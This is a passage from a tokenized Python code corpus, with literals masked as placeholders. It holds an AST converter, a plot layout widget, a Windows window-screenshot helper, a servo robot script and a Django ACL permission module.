_convert <EOL> if hasattr ( n , '<STR_LIT>' ) : <EOL> node = With ( [ c ( x ) for x in n . items ] , [ ] ) <EOL> else : <EOL> items = [ WithItem ( c ( n . context_expr ) , c ( n . optional_vars ) ) ] <EOL> while ( len ( n . body ) == <NUM_LIT:1> ) and isinstance ( n . body [ <NUM_LIT:0> ] , n . __class__ ) : <EOL> n = n . body [ <NUM_LIT:0> ] <EOL> items . append ( WithItem ( c ( n . context_expr ) , c ( n . optional_vars ) ) ) <EOL> node = With ( items , [ ] ) <EOL> self . _stack . append ( ( node . body_nodes , n . body ) ) <EOL> return node <EOL> def _convert_withitem ( self , n ) : <EOL> return WithItem ( self . _convert ( n . context_expr ) , self . _convert ( n . optional_vars ) ) <EOL> def _convert_FunctionDef ( self , n ) : <EOL> c = self . _convert <EOL> args = n . args <EOL> arg_nodes = [ c ( x ) for x in args . args ] <EOL> for i , default in enumerate ( reversed ( args . defaults ) ) : <EOL> arg_node = arg_nodes [ - <NUM_LIT:1> - i ] <EOL> if isinstance ( arg_node , Tuple ) : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> arg_node . value_node = c ( default ) <EOL> if pyversion < ( <NUM_LIT:3> , ) : <EOL> kwarg_nodes = [ ] <EOL> else : <EOL> kwarg_nodes = [ c ( x ) for x in args . kwonlyargs ] <EOL> for i , default in enumerate ( reversed ( args . kw_defaults ) ) : <EOL> kwarg_nodes [ - <NUM_LIT:1> - i ] . value_node = c ( default ) <EOL> if pyversion < ( <NUM_LIT:3> , ) : <EOL> args_node = Arg ( args . vararg , None , None ) if args . vararg else None <EOL> kwargs_node = Arg ( args . kwarg , None , None ) if args . kwarg else None <EOL> elif pyversion < ( <NUM_LIT:3> , <NUM_LIT:4> ) : <EOL> args_node = kwargs_node = None <EOL> if args . vararg : <EOL> args_node = Arg ( args . vararg , None , c ( args . varargannotation ) ) <EOL> if args . kwarg : <EOL> kwargs_node = Arg ( args . kwarg , None , c ( args . kwargannotation ) ) <EOL> else : <EOL> args_node = c ( args . vararg ) <EOL> kwargs_node = c ( args . 
kwarg ) <EOL> returns = None if pyversion < ( <NUM_LIT:3> , ) else c ( n . returns ) <EOL> node = FunctionDef ( n . name , [ c ( x ) for x in n . decorator_list ] , returns , <EOL> arg_nodes , kwarg_nodes , args_node , kwargs_node , <EOL> [ ] ) <EOL> if docheck : <EOL> assert isinstance ( node . args_node , ( NoneType , Arg ) ) <EOL> assert isinstance ( node . kwargs_node , ( NoneType , Arg ) ) <EOL> for x in node . arg_nodes + node . kwarg_nodes : <EOL> assert isinstance ( x , Arg ) <EOL> self . _stack . append ( ( node . body_nodes , n . body ) ) <EOL> return node <EOL> def _convert_Lambda ( self , n ) : <EOL> c = self . _convert <EOL> args = n . args <EOL> arg_nodes = [ c ( x ) for x in args . args ] <EOL> for i , default in enumerate ( reversed ( args . defaults ) ) : <EOL> arg_nodes [ - <NUM_LIT:1> - i ] . value_node = c ( default ) <EOL> if pyversion < ( <NUM_LIT:3> , ) : <EOL> kwarg_nodes = [ ] <EOL> else : <EOL> kwarg_nodes = [ c ( x ) for x in args . kwonlyargs ] <EOL> for i , default in enumerate ( reversed ( args . kw_defaults ) ) : <EOL> kwarg_nodes [ - <NUM_LIT:1> - i ] . value_node = c ( default ) <EOL> return Lambda ( arg_nodes , kwarg_nodes , <EOL> c ( args . vararg ) , c ( args . kwarg ) , c ( n . body ) ) <EOL> def _convert_arg ( self , n ) : <EOL> return Arg ( n . arg or None , None , self . _convert ( n . annotation ) ) <EOL> def _convert_Return ( self , n ) : <EOL> return Return ( self . _convert ( n . value ) ) <EOL> def _convert_Yield ( self , n ) : <EOL> return Yield ( self . _convert ( n . value ) ) <EOL> def _convert_YieldFrom ( self , n ) : <EOL> return YieldFrom ( self . _convert ( n . value ) ) <EOL> def _convert_Global ( self , n ) : <EOL> return Global ( n . names ) <EOL> def _convert_Nonlocal ( self , n ) : <EOL> return Nonlocal ( n . names ) <EOL> def _convert_ClassDef ( self , n ) : <EOL> c = self . _convert <EOL> arg_nodes = [ c ( a ) for a in n . 
bases ] <EOL> kwarg_nodes = [ ] if pyversion < ( <NUM_LIT:3> , ) else [ c ( a ) for a in n . keywords ] <EOL> if getattr ( n , '<STR_LIT>' , None ) : <EOL> arg_nodes . append ( Starred ( self . _convert ( n . starargs ) ) ) <EOL> if getattr ( n , '<STR_LIT>' , None ) : <EOL> kwarg_nodes . append ( Keyword ( None , self . _convert ( n . kwargs ) ) ) <EOL> node = ClassDef ( n . name , [ c ( a ) for a in n . decorator_list ] , <EOL> arg_nodes , kwarg_nodes , [ ] ) <EOL> self . _stack . append ( ( node . body_nodes , n . body ) ) <EOL> return node </s>
<s> """<STR_LIT>""" <EOL> from . import Widget <EOL> from . import Layout , VBox , HBox , GroupWidget , PlotWidget <EOL> class PlotLayout ( Layout ) : <EOL> """<STR_LIT>""" <EOL> def init ( self ) : <EOL> self . _box = HBox ( parent = self ) <EOL> with self . _box : <EOL> self . _left = VBox ( flex = <NUM_LIT:0> ) <EOL> with VBox ( flex = <NUM_LIT:0> ) : <EOL> self . _plot = PlotWidget ( flex = <NUM_LIT:0> , <EOL> style = '<STR_LIT>' ) <EOL> Widget ( flex = <NUM_LIT:1> ) <EOL> Widget ( flex = <NUM_LIT:1> ) <EOL> Widget ( flex = <NUM_LIT:1> , parent = self . _left ) <EOL> def add_tools ( self , name , * args ) : <EOL> """<STR_LIT>""" <EOL> stretch = self . _left . children ( ) [ - <NUM_LIT:1> ] <EOL> stretch . parent ( None ) <EOL> panel = GroupWidget ( title = name , parent = self . _left , flex = <NUM_LIT:0> ) <EOL> vbox = VBox ( parent = panel ) <EOL> for widget in args : <EOL> widget . parent ( vbox ) <EOL> stretch . parent ( self . _left ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> if sys . platform . startswith ( '<STR_LIT>' ) : <EOL> import ctypes <EOL> from ctypes import windll <EOL> from ctypes . wintypes import ( BOOL , DOUBLE , DWORD , HBITMAP , HDC , HGDIOBJ , <EOL> HWND , INT , LPARAM , LONG , UINT , WORD ) <EOL> SRCCOPY = <NUM_LIT> <EOL> DIB_RGB_COLORS = BI_RGB = <NUM_LIT:0> <EOL> class RECT ( ctypes . Structure ) : <EOL> _fields_ = [ ( '<STR_LIT:left>' , ctypes . c_long ) , <EOL> ( '<STR_LIT>' , ctypes . c_long ) , <EOL> ( '<STR_LIT:right>' , ctypes . c_long ) , <EOL> ( '<STR_LIT>' , ctypes . c_long ) ] <EOL> class BITMAPINFOHEADER ( ctypes . Structure ) : <EOL> _fields_ = [ ( '<STR_LIT>' , DWORD ) , ( '<STR_LIT>' , LONG ) , ( '<STR_LIT>' , LONG ) , <EOL> ( '<STR_LIT>' , WORD ) , ( '<STR_LIT>' , WORD ) , <EOL> ( '<STR_LIT>' , DWORD ) , ( '<STR_LIT>' , DWORD ) , <EOL> ( '<STR_LIT>' , LONG ) , ( '<STR_LIT>' , LONG ) , <EOL> ( '<STR_LIT>' , DWORD ) , ( '<STR_LIT>' , DWORD ) ] <EOL> class BITMAPINFO ( ctypes . Structure ) : <EOL> _fields_ = [ ( '<STR_LIT>' , BITMAPINFOHEADER ) , ( '<STR_LIT>' , DWORD * <NUM_LIT:3> ) ] <EOL> GetClientRect = windll . user32 . GetClientRect <EOL> GetWindowRect = windll . user32 . GetWindowRect <EOL> PrintWindow = windll . user32 . PrintWindow <EOL> GetWindowThreadProcessId = windll . user32 . GetWindowThreadProcessId <EOL> IsWindowVisible = windll . user32 . IsWindowVisible <EOL> EnumWindows = windll . user32 . EnumWindows <EOL> EnumWindowsProc = ctypes . WINFUNCTYPE ( ctypes . c_bool , <EOL> ctypes . POINTER ( ctypes . c_int ) , <EOL> ctypes . POINTER ( ctypes . c_int ) ) <EOL> GetWindowDC = windll . user32 . GetWindowDC <EOL> CreateCompatibleDC = windll . gdi32 . CreateCompatibleDC <EOL> CreateCompatibleBitmap = windll . gdi32 . CreateCompatibleBitmap <EOL> SelectObject = windll . gdi32 . SelectObject <EOL> BitBlt = windll . gdi32 . BitBlt <EOL> DeleteObject = windll . gdi32 . DeleteObject <EOL> GetDIBits = windll . gdi32 . GetDIBits <EOL> windll . user32 . 
GetWindowDC . argtypes = [ HWND ] <EOL> windll . gdi32 . CreateCompatibleDC . argtypes = [ HDC ] <EOL> windll . gdi32 . CreateCompatibleBitmap . argtypes = [ HDC , INT , INT ] <EOL> windll . gdi32 . SelectObject . argtypes = [ HDC , HGDIOBJ ] <EOL> windll . gdi32 . BitBlt . argtypes = [ HDC , INT , INT , INT , INT , HDC , INT , INT , DWORD ] <EOL> windll . gdi32 . DeleteObject . argtypes = [ HGDIOBJ ] <EOL> windll . gdi32 . GetDIBits . argtypes = [ HDC , HBITMAP , UINT , UINT , ctypes . c_void_p , <EOL> ctypes . POINTER ( BITMAPINFO ) , UINT ] <EOL> windll . user32 . GetWindowDC . restypes = HDC <EOL> windll . gdi32 . CreateCompatibleDC . restypes = HDC <EOL> windll . gdi32 . CreateCompatibleBitmap . restypes = HBITMAP <EOL> windll . gdi32 . SelectObject . restypes = HGDIOBJ <EOL> windll . gdi32 . BitBlt . restypes = BOOL <EOL> windll . gdi32 . GetDIBits . restypes = INT <EOL> windll . gdi32 . DeleteObject . restypes = BOOL <EOL> def win_for_pid ( pid ) : <EOL> """<STR_LIT>""" <EOL> handles = [ ] <EOL> def called_for_each_win ( hwnd , lParam ) : <EOL> if not IsWindowVisible ( hwnd ) : <EOL> return True <EOL> p_id = ctypes . c_int ( ) <EOL> if p_id . value == pid : <EOL> handles . append ( hwnd ) <EOL> return False <EOL> return True <EOL> EnumWindows ( EnumWindowsProc ( called_for_each_win ) , <NUM_LIT:0> ) <EOL> if handles : <EOL> return handles [ <NUM_LIT:0> ] <EOL> else : <EOL> return None <EOL> def screenshot ( pid , client = True ) : <EOL> """<STR_LIT>""" <EOL> hwnd = win_for_pid ( pid ) <EOL> rect = RECT ( ) <EOL> if client : <EOL> GetClientRect ( hwnd , ctypes . byref ( rect ) ) <EOL> else : <EOL> GetWindowRect ( hwnd , ctypes . byref ( rect ) ) <EOL> left , right , top , bottom = rect . left , rect . right , rect . top , rect . 
bottom <EOL> w , h = right - left , bottom - top <EOL> hwndDC = saveDC = bmp = None <EOL> try : <EOL> hwndDC = GetWindowDC ( hwnd ) <EOL> saveDC = CreateCompatibleDC ( hwndDC ) <EOL> bmp = CreateCompatibleBitmap ( hwndDC , w , h ) <EOL> SelectObject ( saveDC , bmp ) <EOL> if client : <EOL> PrintWindow ( hwnd , saveDC , <NUM_LIT:1> ) <EOL> else : <EOL> PrintWindow ( hwnd , saveDC , <NUM_LIT:0> ) <EOL> buffer_len = h * w * <NUM_LIT:4> <EOL> bmi = BITMAPINFO ( ) <EOL> bmi . bmiHeader . biSize = ctypes . sizeof ( BITMAPINFOHEADER ) <EOL> bmi . bmiHeader . biWidth = w <EOL> bmi . bmiHeader . biHeight = - h <EOL> bmi . bmiHeader . biPlanes = <NUM_LIT:1> <EOL> bmi . bmiHeader . biBitCount = <NUM_LIT:32> <EOL> bmi . bmiHeader . biCompression = BI_RGB <EOL> image = ctypes . create_string_buffer ( buffer_len ) <EOL> bits = windll . gdi32 . GetDIBits ( saveDC , bmp , <NUM_LIT:0> , h , image , bmi , DIB_RGB_COLORS ) <EOL> assert bits == h <EOL> image2 = ctypes . create_string_buffer ( h * w * <NUM_LIT:3> ) <EOL> image2 [ <NUM_LIT:0> : : <NUM_LIT:3> ] = image [ <NUM_LIT:2> : : <NUM_LIT:4> ] <EOL> image2 [ <NUM_LIT:1> : : <NUM_LIT:3> ] = image [ <NUM_LIT:1> : : <NUM_LIT:4> ] <EOL> image2 [ <NUM_LIT:2> : : <NUM_LIT:3> ] = image [ <NUM_LIT:0> : : <NUM_LIT:4> ] <EOL> return bytes ( image2 ) , ( w , h , <NUM_LIT:3> ) <EOL> finally : <EOL> if hwndDC : <EOL> DeleteObject ( hwndDC ) <EOL> if saveDC : <EOL> DeleteObject ( saveDC ) <EOL> if bmp : <EOL> DeleteObject ( bmp ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> im , shape = screenshot ( <NUM_LIT> , True ) <EOL> from flexx . util import icon <EOL> png = icon . write_png ( im , shape ) <EOL> open ( '<STR_LIT>' , '<STR_LIT:wb>' ) . write ( png ) </s>
<s> import time <EOL> import zorg <EOL> def move_servo ( my ) : <EOL> angle = <NUM_LIT:0> <EOL> while True : <EOL> my . servo . set_angle ( angle ) <EOL> angle += <NUM_LIT> <EOL> if angle > <NUM_LIT> : <EOL> angle = <NUM_LIT:0> <EOL> time . sleep ( <NUM_LIT:100> ) <EOL> robot = zorg . robot ( { <EOL> "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } , <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT:5> , <EOL> } , <EOL> } , <EOL> "<STR_LIT>" : move_servo , <EOL> } ) <EOL> robot . start ( ) </s>
<s> import inspect <EOL> from django . core . cache import cache <EOL> from django . conf import settings <EOL> from django . contrib . auth . models import User , AnonymousUser <EOL> from django . db import models <EOL> from django . contrib . contenttypes import generic <EOL> from django . db . models . base import Model , ModelBase <EOL> from django . contrib . contenttypes . models import ContentType <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from django . shortcuts import render_to_response <EOL> from django . template import RequestContext <EOL> from django . http import Http404 , HttpResponseRedirect <EOL> from django . db . models import Q <EOL> from django . core . paginator import Paginator , InvalidPage <EOL> from django . template . loader import render_to_string <EOL> from zorna . account . models import UserGroup <EOL> from zorna import defines <EOL> ACL_USERS_PERMISSIONS_CACHE = u"<STR_LIT>" <EOL> ACL_GROUPS_PERMISSIONS_CACHE = u"<STR_LIT>" <EOL> ACL_MODEL_CACHE = u"<STR_LIT>" <EOL> def get_acl_for_model ( object ) : <EOL> """<STR_LIT>""" <EOL> if inspect . isclass ( object ) : <EOL> model = object <EOL> else : <EOL> model = object . __class__ <EOL> permclass = type ( '<STR_LIT>' , ( BaseACL , ) , { '<STR_LIT>' : model } ) <EOL> return permclass ( ) <EOL> def register_acl_for_model ( model , verbs ) : <EOL> content_type = ContentType . objects . get_for_model ( model ) <EOL> amc = cache . get ( ACL_MODEL_CACHE ) <EOL> if amc is None : <EOL> amc = { } <EOL> try : <EOL> return amc [ content_type . pk ] <EOL> except : <EOL> perms = [ ] <EOL> for k , v in verbs . iteritems ( ) : <EOL> try : <EOL> perm = ACLVerbPermission . objects . get ( <EOL> codename = k , <EOL> content_type = content_type ) <EOL> except ACLVerbPermission . DoesNotExist : <EOL> perm = ACLVerbPermission . objects . create ( <EOL> name = v , <EOL> content_type = content_type , <EOL> codename = k ) <EOL> perms . append ( perm ) <EOL> amc [ content_type . 
pk ] = perms <EOL> cache . set ( ACL_MODEL_CACHE , amc ) <EOL> return amc [ content_type . pk ] <EOL> def get_allowed_objects ( user , model , permission ) : <EOL> if type ( permission ) is list : <EOL> ao = set ( [ ] ) <EOL> for perm in permission : <EOL> ao = ao . union ( set ( ACLPermission . objects . get_acl_objects_by_model ( <EOL> user , model , perm ) ) ) <EOL> return list ( ao ) <EOL> else : <EOL> return ACLPermission . objects . get_acl_objects_by_model ( user , model , permission ) <EOL> def get_acl_by_object ( object , permission ) : <EOL> """<STR_LIT>""" <EOL> return ACLPermission . objects . get_acl_by_object ( object , permission ) <EOL> def get_acl_groups_by_object ( object , permission ) : <EOL> """<STR_LIT>""" <EOL> return ACLPermission . objects . get_acl_groups_by_object ( object , permission ) <EOL> def get_acl_users_by_object ( object , permission ) : <EOL> """<STR_LIT>""" <EOL> return ACLPermission . objects . get_acl_users_by_object ( object , permission ) <EOL> class ACLVerbPermission ( models . Model ) : <EOL> name = models . CharField ( _ ( '<STR_LIT:name>' ) , max_length = <NUM_LIT:255> ) <EOL> content_type = models . ForeignKey ( ContentType ) <EOL> codename = models . CharField ( _ ( '<STR_LIT>' ) , max_length = <NUM_LIT:100> ) <EOL> class Meta : <EOL> verbose_name = _ ( '<STR_LIT>' ) <EOL> verbose_name_plural = _ ( '<STR_LIT>' ) <EOL> unique_together = ( ( '<STR_LIT>' , '<STR_LIT>' ) , ) <EOL> ordering = ( '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> db_table = settings . TABLE_PREFIX + "<STR_LIT>" <EOL> def __unicode__ ( self ) : <EOL> return u"<STR_LIT>" % ( <EOL> unicode ( self . content_type . app_label ) , <EOL> unicode ( self . codename ) ) <EOL> class ACLPermissionManager ( models . Manager ) : <EOL> cache_childs_groups = { } <EOL> def copy_permissions ( self , obj_source , perm_source , obj_target , perm_target ) : <EOL> ct_src = ContentType . objects . get_for_model ( obj_source ) <EOL> ct_target = ContentType . 
objects . get_for_model ( obj_target ) <EOL> self . filter ( object_id = obj_target . pk , content_type = ct_target , <EOL> permission__codename = perm_target ) . delete ( ) <EOL> perms = self . filter ( <EOL> object_id = obj_source . pk , content_type = ct_src , permission__codename = perm_source ) <EOL> check = get_acl_for_model ( obj_target ) <EOL> for p in perms : <EOL> if p . user : <EOL> check . add_perm ( perm_target , obj_target , p . user , p . acltype ) <EOL> else : <EOL> check . add_perm ( perm_target , obj_target , p . group , p . acltype ) <EOL> def cache_acl_groups ( self , object ) : <EOL> acl_groups_permissions = cache . get ( ACL_GROUPS_PERMISSIONS_CACHE ) <EOL> if acl_groups_permissions is None : <EOL> acl_groups_permissions = { } <EOL> ct = ContentType . objects . get_for_model ( object ) <EOL> acl_groups_permissions [ ct . pk ] = { } <EOL> acl_groups_permissions [ ct . pk ] [ object . id ] = { } <EOL> perms = self . filter ( group__isnull = False , object_id = object . pk , content_type = ct ) . values ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) . order_by ( '<STR_LIT>' ) <EOL> for p in perms : <EOL> try : <EOL> groups = acl_groups_permissions [ ct . pk ] [ <EOL> object . id ] [ p [ '<STR_LIT>' ] ] <EOL> except : <EOL> groups = acl_groups_permissions [ ct . pk ] [ <EOL> object . id ] [ p [ '<STR_LIT>' ] ] = [ ] <EOL> if p [ '<STR_LIT>' ] > defines . ZORNA_GROUP_REGISTERED : <EOL> if p [ '<STR_LIT>' ] == defines . ZORNA_PERMISSIONS_DENY_CHILDS or p [ '<STR_LIT>' ] == defines . ZORNA_PERMISSIONS_ALLOW_CHILDS : <EOL> if p [ '<STR_LIT>' ] not in self . cache_childs_groups : <EOL> self . cache_childs_groups [ p [ '<STR_LIT>' ] ] = UserGroup . objects . get ( <EOL> pk = p [ '<STR_LIT>' ] ) . get_descendants ( True ) <EOL> childs = self . cache_childs_groups [ p [ '<STR_LIT>' ] ] <EOL> childs_id = [ g . pk for g in childs ] <EOL> if p [ '<STR_LIT>' ] == defines . 
ZORNA_PERMISSIONS_DENY_CHILDS : <EOL> groups = [ groups - childs_id for groups , childs_id in zip ( <EOL> groups , childs_id ) ] <EOL> else : <EOL> groups . extend ( childs_id ) <EOL> elif p [ '<STR_LIT>' ] == defines . ZORNA_PERMISSIONS_ALLOW : <EOL> groups . append ( p [ '<STR_LIT>' ] ) <EOL> else : <EOL> groups = [ g for g in groups if g != p [ '<STR_LIT>' ] ] <EOL> else : <EOL> if p [ '<STR_LIT>' ] == defines . ZORNA_PERMISSIONS_ALLOW or p [ '<STR_LIT>' ] == defines . ZORNA_PERMISSIONS_ALLOW_CHILDS : <EOL> groups . append ( p [ '<STR_LIT>' ] ) <EOL> else : <EOL> groups = [ g for g in groups if g != p [ '<STR_LIT>' ] ] <EOL> acl_groups_permissions [ ct . pk ] [ object . id ] [ <EOL> p [ '<STR_LIT>' ] ] = groups <EOL> cache . set ( ACL_GROUPS_PERMISSIONS_CACHE , acl_groups_permissions ) <EOL> return acl_groups_permissions <EOL> def get_acl_groups_by_object ( self , object , permission ) : <EOL> """<STR_LIT>""" <EOL> ct = ContentType . objects . get_for_model ( object ) <EOL> acl_groups_permissions = cache . get ( ACL_GROUPS_PERMISSIONS_CACHE ) <EOL> if acl_groups_permissions is None : <EOL> acl_groups_permissions = self . cache_acl_groups ( object ) <EOL> else : <EOL> try : <EOL> acl_groups_permissions [ ct . pk ] [ object . pk ] <EOL> except KeyError : <EOL> acl_groups_permissions = self . cache_acl_groups ( object ) <EOL> try : <EOL> return acl_groups_permissions [ ct . pk ] [ object . id ] [ permission ] <EOL> except : <EOL> return [ ] <EOL> def get_acl_by_object ( self , object , permission ) : <EOL> """<STR_LIT>""" <EOL> allowed_groups = self . get_acl_groups_by_object ( object , permission ) <EOL> if defines . ZORNA_GROUP_PUBLIC in allowed_groups or defines . ZORNA_GROUP_REGISTERED in allowed_groups : <EOL> members = User . objects . filter ( <EOL> is_active = <NUM_LIT:1> ) . order_by ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> ct = ContentType . objects . get_for_model ( object ) <EOL> members = User . objects . 
filter ( Q ( user_profile__groups__in = allowed_groups ) | Q ( <EOL> aclpermission__permission__codename = permission , aclpermission__content_type = ct , aclpermission__object_id = object . pk ) ) . distinct ( ) . order_by ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return members <EOL> def get_acl_users_by_object ( self , object , permission ) : <EOL> """<STR_LIT>""" <EOL> ct = ContentType . objects . get_for_model ( object ) <EOL> members = User . objects . filter ( <EOL> Q ( aclpermission__permission__codename = permission , aclpermission__content_type = ct , <EOL> aclpermission__object_id = object . pk ) ) . distinct ( ) . order_by ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return members <EOL> def get_acl_objects_by_model ( self , user , model , permission ) : <EOL> """<STR_LIT>""" <EOL> contenttype = ContentType . objects . get_for_model ( model ) <EOL> ret = [ ] <EOL> user_id = <NUM_LIT:0> if user . is_anonymous ( ) else user . id <EOL> acl_users_permissions = cache . get ( ACL_USERS_PERMISSIONS_CACHE ) <EOL> if acl_users_permissions is None : <EOL> acl_users_permissions = self . cache_user_permissions ( user ) <EOL> else : <EOL> try : <EOL> acl_users_permissions [ user_id ] <EOL> except KeyError : <EOL> acl_users_permissions = self . cache_user_permissions ( user ) <EOL> try : <EOL> for obj , perm in acl_users_permissions [ user_id ] [ contenttype . id ] . iteritems ( ) : <EOL> try : <EOL> if perm [ permission ] : <EOL> ret . append ( obj ) <EOL> except : <EOL> pass <EOL> except : <EOL> pass <EOL> return ret <EOL> def cache_user_permissions ( self , user ) : <EOL> acl_users_permissions = cache . get ( ACL_USERS_PERMISSIONS_CACHE ) <EOL> if acl_users_permissions is None : <EOL> acl_users_permissions = { } <EOL> if user . is_anonymous ( ) : <EOL> user_id = <NUM_LIT:0> <EOL> user_groups = [ ] <EOL> else : <EOL> user_groups = [ g . id for g in user . get_profile ( ) . groups . all ( ) ] <EOL> user_id = user . 
id <EOL> acl_users_permissions [ user_id ] = { } <EOL> perms = self . filter ( group__isnull = False ) . values ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> for p in perms : <EOL> if not acl_users_permissions [ user_id ] . has_key ( p [ '<STR_LIT>' ] ) : <EOL> acl_users_permissions [ user_id ] [ p [ '<STR_LIT>' ] ] = { } <EOL> if not acl_users_permissions [ user_id ] [ p [ '<STR_LIT>' ] ] . has_key ( p [ '<STR_LIT>' ] ) : <EOL> acl_users_permissions [ user_id ] [ p [ <EOL> '<STR_LIT>' ] ] [ p [ '<STR_LIT>' ] ] = { } <EOL> bok = False <EOL> if p [ '<STR_LIT>' ] == defines . ZORNA_GROUP_PUBLIC : <EOL> bok = True <EOL> elif p [ '<STR_LIT>' ] == defines . ZORNA_GROUP_ANONYMOUS and user . is_anonymous ( ) : <EOL> bok = True <EOL> elif p [ '<STR_LIT>' ] == defines . ZORNA_GROUP_REGISTERED and user . is_anonymous ( ) is False : <EOL> bok = True <EOL> elif p [ '<STR_LIT>' ] > defines . ZORNA_GROUP_REGISTERED : <EOL> if p [ '<STR_LIT>' ] == defines . ZORNA_PERMISSIONS_DENY_CHILDS or p [ '<STR_LIT>' ] == defines . ZORNA_PERMISSIONS_ALLOW_CHILDS : <EOL> if p [ '<STR_LIT>' ] not in self . cache_childs_groups : <EOL> self . cache_childs_groups [ p [ '<STR_LIT>' ] ] = UserGroup . objects . get ( <EOL> pk = p [ '<STR_LIT>' ] ) . get_descendants ( True ) <EOL> childs = self . cache_childs_groups [ p [ '<STR_LIT>' ] ] <EOL> for c in childs : <EOL> if c . pk in user_groups : <EOL> bok = True <EOL> break <EOL> else : <EOL> if p [ '<STR_LIT>' ] in user_groups : <EOL> bok = True <EOL> if bok : <EOL> acl_users_permissions [ user_id ] [ p [ '<STR_LIT>' ] ] [ p [ '<STR_LIT>' ] ] [ p [ '<STR_LIT>' ] ] = True if p [ <EOL> '<STR_LIT>' ] == defines . ZORNA_PERMISSIONS_ALLOW_CHILDS or p [ '<STR_LIT>' ] == defines . ZORNA_PERMISSIONS_ALLOW else False <EOL> acl_users_permissions [ user_id ] [ p [ '<STR_LIT>' ] ] [ <EOL> p [ '<STR_LIT>' ] ] [ '<STR_LIT>' ] = p [ '<STR_LIT>' ] <EOL> if user_id : <EOL> perms = self . filter ( user = user ) . 
values ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> for p in perms : <EOL> if p [ '<STR_LIT>' ] not in acl_users_permissions [ user_id ] : <EOL> acl_users_permissions [ user_id ] [ p [ '<STR_LIT>' ] ] = { } <EOL> if p [ '<STR_LIT>' ] not in acl_users_permissions [ user_id ] [ p [ '<STR_LIT>' ] ] : <EOL> acl_users_permissions [ user_id ] [ p [ <EOL> '<STR_LIT>' ] ] [ p [ '<STR_LIT>' ] ] = { } <EOL> acl_users_permissions [ user_id ] [ p [ '<STR_LIT>' ] ] [ p [ '<STR_LIT>' ] ] [ p [ <EOL> '<STR_LIT>' ] ] = True if p [ '<STR_LIT>' ] == defines . ZORNA_PERMISSIONS_ALLOW else False <EOL> acl_users_permissions [ user_id ] [ p [ '<STR_LIT>' ] ] [ <EOL> p [ '<STR_LIT>' ] ] [ '<STR_LIT>' ] = p [ '<STR_LIT>' ] <EOL> cache . set ( ACL_USERS_PERMISSIONS_CACHE , acl_users_permissions ) <EOL> return acl_users_permissions <EOL> def user_permissions ( self , user , obj , perm ) : <EOL> """<STR_LIT>""" <EOL> user_id = <NUM_LIT:0> if user . is_anonymous ( ) else user . id <EOL> acl_users_permissions = cache . get ( ACL_USERS_PERMISSIONS_CACHE ) <EOL> if acl_users_permissions is None : <EOL> acl_users_permissions = self . cache_user_permissions ( user ) <EOL> else : <EOL> try : <EOL> acl_users_permissions [ user_id ] <EOL> except KeyError : <EOL> acl_users_permissions = self . cache_user_permissions ( user ) <EOL> try : <EOL> ct = ContentType . objects . get_for_model ( obj ) <EOL> return acl_users_permissions [ user_id ] [ ct . pk ] [ obj . id ] [ perm . codename ] <EOL> except : <EOL> return False <EOL> def group_permissions ( self , group , obj , perm ) : <EOL> try : <EOL> return self . get ( group = group , permission = perm , object = obj . id ) <EOL> except ACLPermission . DoesNotExist : <EOL> return False <EOL> def delete_user_permissions ( self , permission , obj ) : <EOL> ct = ContentType . objects . get_for_model ( obj ) <EOL> ACLPermission . objects . filter ( <EOL> permission__codename = permission , object_id = obj . 
pk , content_type = ct , user__isnull = False ) . delete ( ) <EOL> PERMISSIONS_TYPES = ( <EOL> ( <NUM_LIT:0> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:1> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:2> , '<STR_LIT>' ) , <EOL> ( <NUM_LIT:3> , '<STR_LIT>' ) , <EOL> ) <EOL> class ACLPermission ( models . Model ) : <EOL> permission = models . ForeignKey ( ACLVerbPermission ) <EOL> object_id = models . IntegerField ( ) <EOL> content_type = models . ForeignKey ( ContentType ) <EOL> user = models . ForeignKey ( User , null = True ) <EOL> group = models . ForeignKey ( UserGroup , null = True , related_name = '<STR_LIT>' ) <EOL> acltype = models . IntegerField ( <EOL> max_length = <NUM_LIT:1> , choices = PERMISSIONS_TYPES , default = <NUM_LIT:0> ) <EOL> content_object = generic . GenericForeignKey ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> objects = ACLPermissionManager ( ) <EOL> class Meta : <EOL> verbose_name = _ ( '<STR_LIT>' ) <EOL> verbose_name_plural = _ ( '<STR_LIT>' ) <EOL> unique_together = ( ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:user>' , '<STR_LIT>' ) , ) <EOL> db_table = settings . TABLE_PREFIX + "<STR_LIT>" <EOL> def __unicode__ ( self ) : <EOL> return u"<STR_LIT:%s>" % ( <EOL> unicode ( self . permission . codename ) ) <EOL> class ACLGotInvalidModel ( Exception ) : <EOL> pass <EOL> class ACLException ( Exception ) : <EOL> pass <EOL> class NotAModel ( ACLException ) : <EOL> def __init__ ( self , object ) : <EOL> super ( NotAModel , self ) . __init__ ( <EOL> "<STR_LIT>" ) <EOL> class UnsavedModelInstance ( ACLException ) : <EOL> def __init__ ( self , object ) : <EOL> super ( UnsavedModelInstance , self ) . __init__ ( <EOL> "<STR_LIT>" ) <EOL> class ACLMetaclass ( type ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , name , bases , attrs ) : <EOL> new_class = super ( ACLMetaclass , cls ) . __new__ ( cls , name , bases , attrs ) <EOL> if new_class . model is None : 